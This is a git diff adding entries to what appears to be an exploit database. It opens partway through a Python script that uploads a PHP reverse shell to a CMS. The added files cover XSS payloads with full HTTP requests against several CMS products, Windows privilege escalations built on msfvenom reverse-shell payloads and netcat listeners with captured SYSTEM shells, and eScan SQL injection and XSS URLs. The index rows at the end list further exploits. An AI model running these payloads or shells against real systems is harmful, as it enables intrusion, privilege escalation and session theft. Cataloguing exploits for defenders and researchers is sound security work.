+    path = sys.argv[2]
+    if not path.endswith('/'):
+        path += '/'
+
+    ip, port = sys.argv[3].split(':')
+    username = sys.argv[4]
+    shell_content = f"""<?php
+    $ip = '{ip}';
+    $port = {port};
+    $sock = fsockopen($ip, $port);
+    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
+    """
+
+    version = get_version(target, path)
+    if not version:
+        print("(-) could not get version")
+        return
+
+    apikey = api_leak(target, path)
+    if not apikey:
+        print("(-) could not get apikey")
+        return
+
+    headers = set_cookies(username, version, apikey)
+
+    nonce = get_csrf_token(target, path, headers)
+    if not nonce:
+        print("(-) could not get nonce")
+        return
+
+    upload_shell(target, path, headers, nonce, shell_content)
+    shell_trigger(target, path)
+
+if __name__ == '__main__':
+    print_the_banner()
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51476.txt b/exploits/php/webapps/51476.txt
new file mode 100644
index 000000000..2589ae124
--- /dev/null
+++ b/exploits/php/webapps/51476.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-04-15
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://www.bludit.com/
+# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
+# Version: 3.14.1
+# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
+# CVE: CVE-2023-31698
+
+SVG Payload
+-------------
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
+"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+
+save this SVG file xss.svg
+
+Steps to Reproduce:
+
+1. At first login your admin panel.
+2. then go to settings and click the logo section.
+3. Now upload xss.svg file so your request data will be
+
+POST /bludit/admin/ajax/logo-upload HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/112.0
+Content-Type: multipart/form-data;
+boundary=---------------------------15560729415644048492005010998
+Referer: http://127.0.0.1/bludit/admin/settings
+Cookie: BLUDITREMEMBERUSERNAME=admin;
+BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;
+BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
+Content-Length: 651
+
+-----------------------------15560729415644048492005010998
+Content-Disposition: form-data; name="tokenCSRF"
+
+626c201693546f472cdfc11bed0938aab8c6e480
+-----------------------------15560729415644048492005010998
+Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
+"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+
+-----------------------------15560729415644048492005010998--
+
+4. Now open the logo image link that you upload. You will see XSS pop up.
\ No newline at end of file
diff --git a/exploits/php/webapps/51477.txt b/exploits/php/webapps/51477.txt
new file mode 100644
index 000000000..65f9de02b
--- /dev/null
+++ b/exploits/php/webapps/51477.txt
@@ -0,0 +1,17 @@
+# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
+# Date: 2023-04-17
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: http://churchcrm.io/
+# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
+# Version: 4.5.4
+# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
+# CVE: CVE-2023-31699
+
+Steps to Reproduce:
+
+1. At first login your admin panel.
+2. Then click the "Admin" menu and click "CSV Import '' and you will get
+the CSV file uploader option.
+3. now insert xss payload in jpg file using exiftool or from image
+properties and then upload the jpg file.
+4. you will see XSS pop up.
\ No newline at end of file
diff --git a/exploits/php/webapps/51478.txt b/exploits/php/webapps/51478.txt
new file mode 100644
index 000000000..d487ef58d
--- /dev/null
+++ b/exploits/php/webapps/51478.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
+# Date: 2023-02-02
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://civicrm.org
+# Software Link: https://civicrm.org/download
+# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)
+# CVE: CVE-2023-25440
+Vendor Security Advisory: CIVI-SA-2023-05
+
+
+Description:
+
+A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web
+scripts or HTML.
+
+Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name
+field, it will be triggered once page gets loaded.
+
+
+Steps to reproduce:
+
+- Quick Add contact to CiviCRM,
+- Insert a payload PoC inside the field(s)
+- Click on 'Add contact'.
+
+If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/51446.txt b/exploits/ruby/webapps/51446.txt
new file mode 100644
index 000000000..f936d77a5
--- /dev/null
+++ b/exploits/ruby/webapps/51446.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
+# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
+a fexible content management system (CMS) based on Ruby on Rails"
+# Date: 2023-10-05
+# Exploit Author: Yasin Gergin
+# Vendor Homepage: http://camaleon.tuzitio.com
+# Software Link: https://github.com/owen2345/camaleon-cms
+# Version: 2.7.4
+# Tested on: Linux kali 6.1.0-kali7-amd64
+# CVE : -
+
+--- Description ---
+
+http://127.0.0.1:3000/admin/login - Login as a Admin
+
+Under Post tab click on "Create New"
+
+While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>
+
+http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
+to this url
+
+-- POST DATA --
+
+POST /admin/post_type/2/posts HTTP/1.1
+
+Host: 127.0.0.1:3000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 666
+Origin: http://127.0.0.1:3000
+Connection: keep-alive
+Cookie:
+_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
+auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
+phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+
+authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=
+
+-- POST DATA --
+
+Then view the post you've created by clicking on "View Page" move your
+mouse cursor onto post title. XSS will popup.
\ No newline at end of file
diff --git a/exploits/windows/local/51453.txt b/exploits/windows/local/51453.txt
new file mode 100644
index 000000000..561417d2b
--- /dev/null
+++ b/exploits/windows/local/51453.txt
@@ -0,0 +1,91 @@
+#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
+#  Date: 2023/05/04
+#  Exploit Author: msd0pe
+#  Vendor Homepage: https://www.trendmicro.com
+#  My Github: https://github.com/msd0pe-1
+
+
+Trend Micro OfficeScan Client:
+Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.
+
+[1] Verify the folder rights:
+    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
+
+    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
+                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
+                                                         NT AUTHORITY\SYSTEM:(F)
+                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
+                                                         BUILTIN\Administrators:(F)
+                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
+                                                         BUILTIN\Users:(F)
+                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
+                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
+                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
+                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
+
+[2] Get informations about the services:
+    > sc qc tmlisten
+
+    [SC] QueryServiceConfig SUCCESS
+
+    SERVICE_NAME: tmlisten
+            TYPE               : 10  WIN32_OWN_PROCESS
+            START_TYPE         : 2   AUTO_START
+            ERROR_CONTROL      : 1   NORMAL
+            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
+            LOAD_ORDER_GROUP   :
+            TAG                : 0
+            DISPLAY_NAME       : OfficeScan NT Listener
+            DEPENDENCIES       : Netman
+                               : WinMgmt
+            SERVICE_START_NAME : LocalSystem
+
+OR
+
+    > sc qc ntrtscan
+
+    SERVICE_NAME: ntrtscan
+            TYPE               : 10  WIN32_OWN_PROCESS
+            START_TYPE         : 2   AUTO_START
+            ERROR_CONTROL      : 1   NORMAL
+            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
+            LOAD_ORDER_GROUP   :
+            TAG                : 0
+            DISPLAY_NAME       : OfficeScan NT RealTime Scan
+            DEPENDENCIES       :
+            SERVICE_START_NAME : LocalSystem
+
+[3] Generate a reverse shell:
+    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
+
+    OR
+
+    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
+
+[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe
+
+[5] Start listener
+    > nc -lvp 4444
+
+[6] Reboot the service/server
+    > sc stop tmlisten
+    > sc start tmlisten
+
+    OR
+
+    > sc stop ntrtscan
+    > sc start ntrtscan
+
+    OR
+
+    > shutdown /r
+
+[7] Enjoy !
+    192.168.1.102: inverse host lookup failed: Unknown host
+    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
+    Microsoft Windows [Version 10.0.19045.2130]
+    (c) Microsoft Corporation. All rights reserved.
+
+    C:\Windows\system32>whoami
+
+    nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/51461.txt b/exploits/windows/local/51461.txt
new file mode 100644
index 000000000..5de9dbfd9
--- /dev/null
+++ b/exploits/windows/local/51461.txt
@@ -0,0 +1,48 @@
+*#Exploit Title:*  Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
+*#Date:* 14/05/2023
+*#Exploit Author:* Ahsan Azad
+*#Vendor Homepage:* https://hubstaff.com/
+*#Software Link:* https://app.hubstaff.com/download
+*#Version:* 1.6.13, 1.6.14
+*#Tested On:* 64-bit operating system, x64-based processor
+
+*Description*
+Hubstaff is an employee work tracker with screenshots, timesheets, billing,
+in-depth reports, and more.
+
+During testing. It was found that the system32 subdirectory was missing a
+DLL library with the name *wow64log.dll* that had been required by the
+hubstaff's setup file during installation. Hence, using Metasploit's
+msfvenom to create a new wow64log.dll file, Tester was able to get a
+reverse shell locally.
+
+
+*Exploit*
+1- Generate a dll file with the name  wow64log.dll using the command:
+
+*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
+-o  wow64log.dll*
+
+2- Place the newly generated DLL to the *system32 *directory.
+3- Start a listener on attacker's console using:
+
+*nc -lnvp <port_used_while_generating_DLL>*
+
+4- Launch the exe.
+
+Reverse shell will be receive as:
+
+
+*C:\Windows>*
+
+
+
+*Attachments (For the understanding of verification team)*
+1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
+
+2.png - Showing how tester was able to generate a new dll using msfvenom on
+port 1337.
+[image: 2.png]
+
+3.png - Showing a reverse connection received on the attacker's console
+at C:\Windows> by launching the exe.[image: 3.png]
\ No newline at end of file
diff --git a/exploits/windows/local/51479.txt b/exploits/windows/local/51479.txt
new file mode 100644
index 000000000..a51317cad
--- /dev/null
+++ b/exploits/windows/local/51479.txt
@@ -0,0 +1,53 @@
+# Exploit Title :MobileTrans  4.0.11 - Weak Service Privilege Escalation
+# Date: 20  May 2023
+# Exploit Author: Thurein Soe
+# Vendor Homepage: https://mobiletrans.wondershare.com/
+# Software Link:
+https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
+# Version: MobileTrans version 4.0.11
+# Tested on: Window 10 (Version 10.0.19045.2965)
+# CVE : CVE-2023-31748
+
+
+
+Vulnerability Description:
+
+MobileTrans is World 1 mobile-to-mobile file transfer
+application.MobileTrans version 4.0.11 was being suffered a weak service
+permission vulnerability that allows a normal window user to elevate to
+local admin. The "ElevationService" service name was installed, while the
+MobileTrans version 4.0.11 was installed in the window operating system.
+The service "ElevationService" allows the local user to elevate to the
+local admin as The "ElevationService" run with system privileges.
+Effectively, the local user is able to elevate to local admin upon
+successfully modifying the service or replacing the affected executable.
+
+C:\Users\HninKayThayar\Desktop>sc qc ElevationService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ElevationService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files
+(x86)\Wondershare\MobileTrans\ElevationService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wondershare Driver Install Service help
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files
+(x86)\Wondershare\MobileTrans\ElevationService.exe"
+C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
+   Everyone:(ID)F
+                                                                    NT
+AUTHORITY\SYSTEM:(ID)F
+
+BUILTIN\Administrators:(ID)F
+
+BUILTIN\Users:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
\ No newline at end of file
diff --git a/exploits/windows/webapps/51466.txt b/exploits/windows/webapps/51466.txt
new file mode 100644
index 000000000..abd027186
--- /dev/null
+++ b/exploits/windows/webapps/51466.txt
@@ -0,0 +1,23 @@
+# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
+# Date: 16/05/2023
+# Exploit Author: Sahil Ojha
+# Vendor Homepage: https://www.escanav.com
+# Software Link: https://cl.escanav.com/ewconsole.dll
+# Version: 14.0.1400.2281
+# Tested on: Windows
+# CVE : CVE-2023-31702
+
+*Step of Reproduction/Proof of concept(POC)*
+
+1. Login into the escan management console with a valid username and
+password as root user.
+2. Navigate to URL:
+https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
+3. Inject the payload into the UsrId parameter to confirm the SQL
+injection as shown below:
+https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
+DELAY '0:0:5'--&cnt=4176
+4. The time delay of 5 seconds confirmed that "UsrId" parameter was
+vulnerable to SQL Injection. Furthermore, it was also possible to dump
+all the databases and inject OS shell directly into the MS SQL Server
+using SQLMap tool.
\ No newline at end of file
diff --git a/exploits/windows/webapps/51467.txt b/exploits/windows/webapps/51467.txt
new file mode 100644
index 000000000..8eba64c60
--- /dev/null
+++ b/exploits/windows/webapps/51467.txt
@@ -0,0 +1,19 @@
+# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
+# Date: 2023-05-16
+# Exploit Author: Sahil Ojha
+# Vendor Homepage: https://www.escanav.com
+# Software Link: https://cl.escanav.com/ewconsole.dll
+# Version: 14.0.1400.2281
+# Tested on: Windows
+# CVE : CVE-2023-31703
+
+*Step of Reproduction/ Proof of Concept(POC)*
+
+1. Login into the eScan Management Console with a valid user credential.
+2. Navigate to URL:
+https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
+3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
+shown below and a valid XSS pop up appeared.
+https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
+4. By exploiting this vulnerability, any arbitrary attacker could have
+stolen an admin user session cookie to perform account takeover.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f0fd6053a..9d9bbe31f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3802,6 +3802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27892,exploits/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware,,2006-05-17,2013-08-27,1,CVE-2006-2490;OSVDB-25621,,,,,https://www.securityfocus.com/bid/18022/info
 20892,exploits/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",remote,hardware,,2001-03-25,2012-08-28,1,CVE-2001-0380;OSVDB-8817,,,,,https://www.securityfocus.com/bid/2802/info
 50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",2022-08-01,"Momen Eldawakhly",remote,hardware,,2022-08-01,2022-08-01,0,,,,,,
+51444,exploits/hardware/remote/51444.txt,"Optoma 1080PSTX Firmware C02 - Authentication Bypass",2023-05-23,"Anthony Cole",remote,hardware,,2023-05-23,2023-05-23,0,CVE-2023-27823,,,,,
 8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,,2009-02-22,,1,OSVDB-52370,,,,,
 21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware,,2002-08-09,2012-10-03,1,CVE-2002-0812;OSVDB-11315,,,,,https://www.securityfocus.com/bid/5436/info
 51306,exploits/hardware/remote/51306.txt,"Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection",2023-04-06,LiquidWorm,remote,hardware,,2023-04-06,2023-04-06,0,,,,,,
@@ -3860,6 +3861,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,,
 51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,,
+51455,exploits/hardware/remote/51455.py,"Screen SFT DAB 600/C - Authentication Bypass Account Creation",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51458,exploits/hardware/remote/51458.py,"Screen SFT DAB 600/C - Authentication Bypass Admin Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51457,exploits/hardware/remote/51457.py,"Screen SFT DAB 600/C - Authentication Bypass Erase Account",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51456,exploits/hardware/remote/51456.py,"Screen SFT DAB 600/C - Authentication Bypass Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51459,exploits/hardware/remote/51459.py,"Screen SFT DAB 600/C - Authentication Bypass Reset Board Config",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51460,exploits/hardware/remote/51460.txt,"Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
@@ -4628,6 +4635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6282,"Cross-Site Request Forgery (CSRF)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
 46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6279,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
 48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,,2020-08-20,2020-08-20,0,,,,,,
+51448,exploits/hardware/webapps/51448.txt,"PnPSCADA v2.x - Unauthenticated PostgreSQL Injection",2023-05-23,"Momen Eldawakhly",webapps,hardware,,2023-05-23,2023-05-23,0,CVE-2023-1934,,,,,
 17377,exploits/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-06-09,0,OSVDB-73117,,,,,
 37449,exploits/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",webapps,hardware,,2015-06-30,2015-06-30,0,CVE-2015-4685;CVE-2015-4684;CVE-2015-4683;CVE-2015-4682;CVE-2015-4681;OSVDB-123783;OSVDB-123782;OSVDB-123780;OSVDB-123779;OSVDB-123778;OSVDB-123776,,,,,
 41175,exploits/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",webapps,hardware,,2017-01-26,2017-01-26,0,,,,,,
@@ -10304,6 +10312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,,
 8067,exploits/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",local,multiple,,2009-02-15,,1,CVE-2009-0390,,,,,
 10326,exploits/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow",2009-02-03,"Wolfgang Hamann",local,multiple,,2009-02-02,2017-07-14,0,,,2009-12-05-34340.ps,,,
+51469,exploits/multiple/local/51469.txt,"Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31873,,,,,
 19430,exploits/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",local,multiple,,1999-07-25,2012-06-27,1,OSVDB-83457,,,,,https://www.securityfocus.com/bid/540/info
 24923,exploits/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",local,multiple,,2013-04-08,2013-04-08,0,OSVDB-91982,,,,,http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf
 39656,exploits/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,local,multiple,,2016-04-04,2016-04-04,0,CVE-2016-2087,,,,http://www.exploit-db.comhexchat-2.10.0.tar.xz,
@@ -10441,6 +10450,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,,2018-10-26,2018-10-26,0,CVE-2018-14665,,,,,https://twitter.com/hackerfantastic/status/1055517801224396800
 9985,exploits/multiple/local/9985.txt,"Xpdf 3.01 - Local Heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",local,multiple,,2009-10-16,,1,,,,,,
 9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,,
+51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
@@ -11551,6 +11561,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42324,exploits/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution",2017-07-07,"Vex Woo",webapps,multiple,,2017-07-14,2018-05-17,1,CVE-2017-9791;S2-048,,s2-048;Struts-048,,,https://github.com/nixawk/labs/blob/943764ccb3b36a419729062f23972fd0d726bd24/CVE-2017-9791/exploit_S2-048.py
 44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,,2018-05-03,2018-05-03,1,CVE-2013-2251,,,,,
